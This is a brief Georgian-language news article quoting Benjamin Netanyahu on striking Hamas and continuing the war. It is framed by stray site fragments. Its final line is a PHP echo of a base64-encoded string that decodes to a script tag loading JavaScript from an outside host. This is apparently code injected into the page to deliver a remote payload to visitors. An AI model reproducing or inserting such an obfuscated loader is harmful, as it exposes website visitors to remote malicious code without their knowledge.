celsiusi
ავერსი საქკაბელი

ჩვენ ძლიერად დავარტყით „ჰამასს“, მაგრამ ეს მხოლოდ დასაწყისია, – ამის შესახებ ისრაელის პრემიერ-მინისტრმა, ბენიამინ ნეთანიაჰუმ განაცხადა.

ისრაელის მთავრობის ხელმძღვანელის თქმით, ისრაელი არასოდეს დაივიწყებს სისასტიკეს, რომელიც ქვეყნის მტრებმა ჩაიდინეს.

„დღეს ყველამ იცის, რომ ჩვენ სამშობლოსთვის ვიბრძვით, ლომებივით ვიბრძვით. ბევრად მეტი იქნება მოთხრობილი ჩვენი ხალხის გმირობაზე იმ წყეული შაბათის ღრმა ტკივილის ბნელ დღეებში – ისტორიები, რომლებიც დარჩება ისრაელის იდენტობაში. ჩვენ არასოდეს დავივიწყებთ და არასოდეს ვაპატიებთ სისასტიკეს, რომელიც ჩვენმა მტრებმა ჩაიდინეს. არასოდეს მივცემთ უფლებას მსოფლიოს ან ვინმეს დაივიწყოს ეს სისასტიკე, რომელიც არ ჩაუდენიათ ებრაელი ხალხის მიმართ მრავალი ათწლეულის განმავლობაში. ჩვენმა მტრებმა ახლახან დაიწყეს ფასის გადახდა. არ დავაკონკრეტებ რა იქნება შემდეგ, მაგრამ გეუბნებით, რომ ეს მხოლოდ დასაწყისია. ჩვენ უზრუნველვყოფთ ომის გაგრძელებას ისრაელში მეტი საბრძოლო მასალისა და იარაღის შემოტანით. ჩვენ გავანადგურებთ „ჰამასს“ და გავიმარჯვებთ. ამას დრო დასჭირდება, მაგრამ ჩვენ დავასრულებთ ამ ომს უფრო ძლიერად, ვიდრე ოდესმე“, – განაცხადა ბენიამინ ნეთანიაჰუმ.

240
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");